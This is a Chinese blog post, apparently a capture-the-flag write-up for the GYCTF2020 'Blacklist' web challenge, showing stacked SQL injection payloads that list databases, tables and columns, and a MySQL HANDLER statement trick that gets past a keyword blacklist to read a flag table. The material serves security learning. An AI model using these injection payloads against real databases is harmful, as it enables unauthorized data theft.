[GYCTF2020]Blacklist

已于 2022-05-14 15:29:53 修改
阅读量3.8k 收藏 9
点赞数 4
分类专栏: 题目wp 文章标签: web安全 php 网络
于 2022-04-19 14:23:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62092622/article/details/124272307
版权

刚开始是这样

既然有个1那就先输入1查询一下吧

返回了一个数组

再加一个单引号,出现报错,说明存在SQL注入

看这个题第一想法就是堆叠注入

为了防止输入1时的干涉,我们输入0(单纯输入0是不会出现任何回应的)

0';show databases;#

然后得到数据库的名字

 然后查询表格

0';show tables;#

FlagHere提示的已经很明显,我们来查询这个表格列名

0';show columns from `FlagHere`;#

本来是直接查询flag就可以了

0';select flag from `FlagHere`;#

但是此时提示不能出现以下关键词

 我们知道/**/可以绕过检查,所以修改payload

0';sel/**/ect flag from `FlagHere`;#

但是竟然什么都没有

然后查询wp发现还有一种操作

HANDLER ... OPEN语句打开一个表,使其可以使用后续HANDLER ... READ语句访问,该表对象未被其他会话共享,并且在会话调用HANDLER ... CLOSE或会话终止之前不会关闭

这是一个例子

HANDLER tbl_name OPEN [ [AS] alias]

HANDLER tbl_name READ index_name { = | <= | >= | < | > } (value1,value2,...)
    [ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name READ index_name { FIRST | NEXT | PREV | LAST }
    [ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name READ { FIRST | NEXT }
    [ WHERE where_condition ] [LIMIT ... ]

HANDLER tbl_name CLOSE

 更多可参考MySQL :: MySQL 8.0 Reference Manual :: 13.2.4 HANDLER Statement

所以按照这个重新构造payload

0';HANDLER FlagHere OPEN;HANDLER FlagHere READ FIRST;HANDLER FlagHere CLOSE;#

得到flag

感觉其他两个题和这个差不多,就把链接放下面了

[SUCTF 2019]EasySQL_-眼里有星河-的博客-CSDN博客

[强网杯 2019]随便注_-眼里有星河-的博客-CSDN博客

-眼里有星河-
关注
  • 4
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
cpf_blacklist
02-08
cpf_blacklist
Quick-Blacklist
06-15
快速黑名单 一个轻量级实用程序,用于将玩家和库存中的项目列入黑名单。
buuctf[GYCTF2020]Blacklist
qq_75005708的博客
04-25 141
如果使用别名打开表,使用其他 HANDLER 语句对打开的表的进一步引用必须使用别名,而不是表名。如果不使用别名,但使用由数据库名称限定的表名打开表,则进一步的引用必须使用不限定的表名。例如,使用 mydb.mytable 打开的表,进一步引用必须使用 mytable。和输入1的时候是一样的,看了wp之后发现其他的方法,运用HANDLER 语句。open是打开,read是开始读取的意思,close是结束的意思。是有一个1,我们查询之后会发现出现以上页面,我们再试一下1'然后我们就可以拿到我们的答案了。
BUUCTF之[GYCTF2020]Blacklist--------堆叠查询
weixin_44632787的博客
06-19 630
BUUCTF之[GYCTF2020]Blacklist--------堆叠查询 启动挑战项目,发现前端界面显示Black list is so weak for you,isn’t it 又是一道用堆叠查询的题目,看来CTF也很喜欢考这类型的题目呀! 首先爆出数据库:1’;show databases; 然后爆出表名:1’; show tables; 然后显示某个表里面列的信息:1’;show columns from FlagHere; 接下来的才是重点,在MYSQL数据库中: 可以用handl
BUUCTF_Web题目题解记录1
Altering_Ji的博客
07-11 2274
记录一下buu 刷题网站上最近做的三道web题目:[GYCTF2020]Blacklist(堆叠注入)、[网鼎杯 2020 青龙组]AreUSerialz(反序列化)、[GXYCTF2019]BabyUpload(文件上传)
[GYCTF2020]Blacklist(堆叠注入)
记录学习,一起进步
01-19 1960
[GYCTF2020]Blacklist(堆叠注入)
[GYCTF2020]Blacklist1-BUUCTF-详解
chinese_cabbage0的博客
02-05 1570
主要是buuctf的整个题目的解题过程,比较好理解,也比较全面,大家可以参考一下
android_system_blacklist_android_msm8610_
10-03
msm8610 android system
blacklist-jee
07-08
blacklist-jee 您将需要 Java8 来编译和运行。 检查您的应用程序是否正在运行在安装了 git、java8、docker 和 maven 的本地 Ubuntu VM 中进行开发先决条件:已安装 VirtualBox 和 Vagrant。 从该项目的根目录初始化...
Mikrotik-Blacklist
03-05
/tool fetch address=raw.githubusercontent.com host=raw.githubusercontent.com mode=https src-path=stathis/Mikrotik-Blacklist/master/a_blacklist_file.rsc/import a_blacklist_File.rsc其他资讯此回购应该...
2020/7/10 - [GYCTF2020]Blacklist - handler绕过sql黑名单
抒情诗
07-10 844
文章目录1.先看是什么类型的注入2.测试堆叠注入3.最终payload 这个跟[强网杯 2019]随便注这道题有些类似,都是堆叠注入的形式,不同有 1.那个似乎是数字型注入,这个是字符型的注入 2.那个黑名单过滤的少,这个几乎能用的都过滤了 1.先看是什么类型的注入 分别用 1 or 1=1# 1’ or 1=1# 1" or 1=1# 执行测试,返回全部库信息的即是该类型。试一下,发现是单引号字符型注入。 2.测试堆叠注入 使用以下payload测试是否是堆叠注入 1';show databases;#
[GYCTF2020]Blacklist&&[强网杯 2019]随便注
uihijio的博客
05-06 450
因为2020blacklist是2019随便注的升级版,所以借着这个机会归纳一下 先做个比较两道题的不同处,由此可见blacklist是随便注的升级版。 blacklist比随便注多过滤了set,prepare,rename,alter。 过滤prepare,set是避免pdo预处理绕过 过滤rename,alter是避免修改表名的情况出现 而blacklist和随便注还有一种方法是handler...
BUUCTF [GYCTF2020] Blacklist
Senimo
12-08 1301
BUUCTF [GYCTF2020] Blacklist 启动靶机: 提交参数1后正常回显内容:
网络安全】一次sql注入问题的处理
最新发布
dualvencsdn的博客
05-10 376
(1)在进行问题解决之前,我们发现 ,即使我们已经在后能进行了打印,确保了不会有sql注入问题。如下。但在当时 ,依然 会有被 -dbs扫描而出的数据库思考:经过程序的打印,已经没有了不正确的sql注入;但依然可以dbs扫描打印出数据库信息 ,有可能是缓存的信息,前面扫描出来的数据库信息!(2)将sqlmap的缓存文件,如下,其中session.sqlite进行取出,用chat2db打开。发现其中的缓存 信息。如下列各图。
blacklist.conf
09-06
blacklist.conf是一个配置文件,用于在Nginx服务器中设置黑名单。可以通过在nginx.conf文件中添加`include /usr/local/nginx/conf/blacklist.conf;`来引入blacklist.conf文件。 在blacklist.conf文件的最后部分,可以插入以下两行内容来禁用nouveau驱动的选项:`blacklist nouveau options nouveau modeset=0`。 另外,如果想要禁用树莓派上的Pi插Kong输入,可以编辑`/etc/modprobe.d/alsa-blacklist.conf`文件,并添加`blacklist snd_bcm2835`一行。然后,需要重新配置音频设备的索引,可以编辑`/lib/modprobe.d/aliases.conf`文件,并更改`options snd-usb-audio index...`所在行的配置。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [nginx 加ip黑名单](https://blog.csdn.net/weixin_43275578/article/details/128966558)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [ubuntu16.04Nvidia驱动、CUDA、cuDNN安装与卸载](https://blog.csdn.net/u013898698/article/details/119000021)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [piloopdrumbox:Raspberry pi +鼓垫+循环站](https://download.csdn.net/download/weixin_42115513/15186998)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值